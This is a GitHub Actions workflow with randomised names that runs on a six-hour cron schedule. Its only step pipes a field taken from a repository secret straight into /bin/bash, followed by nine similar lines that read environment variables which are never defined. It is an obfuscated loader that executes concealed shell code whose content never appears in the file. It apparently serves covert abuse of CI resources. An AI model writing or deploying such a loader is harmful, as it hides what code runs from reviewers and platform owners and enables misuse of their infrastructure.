name: duikkkx
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duikkkx
        env:
          v3: ${{ secrets.v3 }}
        run: |
          echo $v3 | jq -r .fvjb9286 | /bin/bash
          echo $f2 | jq -r .v56 | /bin/bash
          echo $nzlhy375 | jq -r .h90 | /bin/bash
          echo $toab4 | jq -r .wxdau4 | /bin/bash
          echo $mvo5 | jq -r .dfn9962 | /bin/bash
          echo $qpo9 | jq -r .pjqty38425 | /bin/bash
          echo $e037 | jq -r .ilhm2384 | /bin/bash
          echo $gic9 | jq -r .wqttp90 | /bin/bash
          echo $h75233 | jq -r .zlsuk25 | /bin/bash
          echo $lmo8444 | jq -r .bcac92429 | /bin/bash

